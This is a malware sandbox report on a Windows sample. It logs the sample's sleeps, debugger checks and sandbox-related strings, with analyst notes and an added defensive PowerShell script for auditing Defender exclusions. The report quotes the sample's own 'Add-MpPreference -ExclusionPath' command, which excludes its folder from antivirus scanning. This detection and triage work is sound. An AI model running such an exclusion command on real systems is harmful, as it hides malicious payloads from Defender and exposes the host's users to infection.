Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe Thread delayed: delay time: 922337203685477 (3 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (6 entries)
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe Window / User API: threadDelayed 517
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6552
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2189
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe Window / User API: threadDelayed 437
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4696
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1917
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe Window / User API: threadDelayed 404
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5787
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 933
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 520 Thread sleep count: 252 > 30
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 520 Thread sleep count: 517 > 30
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5476 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 5476 Thread sleep time: -100000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3032 Thread sleep count: 6552 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2708 Thread sleep count: 2189 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1796 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5956 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7612 Thread sleep count: 437 > 30
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7648 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 7648 Thread sleep time: -100000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7676 Thread sleep count: 4696 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7676 Thread sleep count: 1917 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8024 Thread sleep count: 404 > 30
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8096 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe TID: 8096 Thread sleep time: -100000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8100 Thread sleep count: 5787 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8100 Thread sleep count: 933 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1836 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8160 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed (6 entries)
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe Thread delayed: delay time: 922337203685477 (3 entries)
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe Thread delayed: delay time: 100000 (3 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (6 entries)
Note: 922337203685477 is TimeSpan.MaxValue in whole milliseconds (Int64.MaxValue ticks of 100 ns divided by 10000), i.e. a "wait indefinitely" timeout, and the negative sleep times are relative NT delay intervals. The same value is logged for powershell.exe, so it is a .NET runtime wait, not a sleep length the sample chose. The entries that do indicate deliberate stalling belong to the sample's own threads: TIDs 520, 7612 and 8024 sleeping several hundred times each, and the explicit 100000 delay that exceeds the report's 30000 threshold. These back the "Contains long sleeps" and "May sleep (evasive loops)" signatures in the summary.
Source: Amcache.hve.7.dr Binary or memory string: VMware
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000E23000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
Source: Amcache.hve.7.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.7.dr Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.7.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Note: Amcache.hve.7.dr is the analysis machine's own Amcache registry hive, captured because it was modified during the run. The VMware and Hyper-V device, driver and BIOS strings in it are the sandbox's hardware inventory, not strings carried by the sample. The only hit inside the sample's memory, "Hyper-V RAW" next to mswsock.dll, is the name of the Hyper-V socket provider in the Winsock catalog and is present in any process that initialises Winsock. None of these entries show the sample actively checking for a hypervisor.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe Process queried: DebugPort (6 entries)
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe Memory allocated: page read and write | page guard
Note: the DebugPort queries are NtQueryInformationProcess(ProcessDebugPort) calls, the check behind CheckRemoteDebuggerPresent and the "Checks if the current process is being debugged" signature; they come only from the sample. "Process token adjusted: Debug" is SeDebugPrivilege being enabled ("Enables debug privileges" in the summary); powershell.exe does the same here, so that part is ordinary runtime behaviour.

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop (9 entries, identical command line; the misplaced quote is preserved as logged)
Note: the excluded path is the directory the sample runs from (C:\Users\user\Desktop), the usual shape of this technique: carve the payload's own location out of Defender's scanning before the next stage is written there. The child is the SysWOW64 (32-bit) PowerShell because the parent is a 32-bit process and its System32 lookups are redirected. Add-MpPreference is a CIM-based cmdlet and needs administrative rights; the report records the attempt, not whether it succeeded.
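The exclusion above covers the sample's own directory. As an added triage example, not part of the Joe Sandbox report, the following PowerShell session audits a host for exclusions of that shape and pulls the two event sources that would have recorded this Add-MpPreference call. The list of user-writable roots is a triage assumption of this example, not a Defender setting; the cmdlets, log names and event IDs are standard Windows ones.

```powershell
# Added triage example (not from the sandbox report). Run in an elevated PowerShell 5.1
# session on a host with Microsoft Defender: Get-MpPreference and the Defender operational
# log both need administrative rights.

# Assumption (triage heuristic, not a Microsoft list): exclusions rooted in these
# directories let user-controlled files escape scanning and deserve a second look.
$UserWritableRoots = @('C:\Users\', 'C:\ProgramData\', 'C:\Windows\Temp\')

function Get-SuspiciousDefenderExclusion {
    [CmdletBinding()]
    param([string[]] $Roots = $UserWritableRoots)

    $pref = Get-MpPreference
    foreach ($path in @($pref.ExclusionPath)) {
        if (-not $path) { continue }          # ExclusionPath is $null when nothing is excluded
        $flagged = $false
        foreach ($root in $Roots) {
            if ($path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
                $flagged = $true
                break
            }
        }
        [pscustomobject]@{ ExclusionPath = $path; UserWritable = $flagged }
    }
}

# 1. Exclusions currently in force. The sample's C:\Users\user\Desktop would show UserWritable = True.
Get-SuspiciousDefenderExclusion | Sort-Object UserWritable -Descending | Format-Table -AutoSize

# 2. Defender writes every preference change as Event ID 5007 to its operational log, whether
#    the change came from PowerShell, the registry or the UI. The message names the registry
#    value that changed (...\Exclusions\Paths\<path>), so filter on that.
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'
    Id      = 5007
} -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'Exclusions\\Paths' } |
    Select-Object TimeCreated, Message |
    Format-List

# 3. If script block logging is enabled, Event ID 4104 carries the cmdlet text as executed,
#    which ties the 5007 change back to the process that requested it.
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'
    Id      = 4104
} -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'Add-MpPreference\s+-ExclusionPath' } |
    Select-Object TimeCreated, ProcessId, Message |
    Format-List

# 4. Remediation for a confirmed finding: drop the exclusion (uncomment and set the path).
# Remove-MpPreference -ExclusionPath 'C:\Users\user\Desktop'
```

Event 5007 is always recorded, so it is the reliable pivot; 4104 only exists where script block logging has been turned on by policy, and a 32-bit PowerShell host such as the SysWOW64 one in this report logs to the same channel as the 64-bit one.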
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe Queries volume information: C:\Users\user\Desktop\9K25QyJ4hA.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (2 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe Queries volume information: C:\Users\user\Desktop\9K25QyJ4hA.exe VolumeInformation
Note: the catalog (.cat) and GAC assembly queries are PowerShell loading modules and checking their catalog signatures; Microsoft.Management.Infrastructure is pulled in because Add-MpPreference is a CIM cmdlet. The sample's own contribution to the "Queries the volume information" signature is a single query against its own image, which is not by itself a fingerprinting step.
Second analysis run: powershell.exe repeats the 19 catalog and GAC assembly queries listed above and the sample again queries C:\Users\user\Desktop\9K25QyJ4hA.exe VolumeInformation (20 entries, identical paths).
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
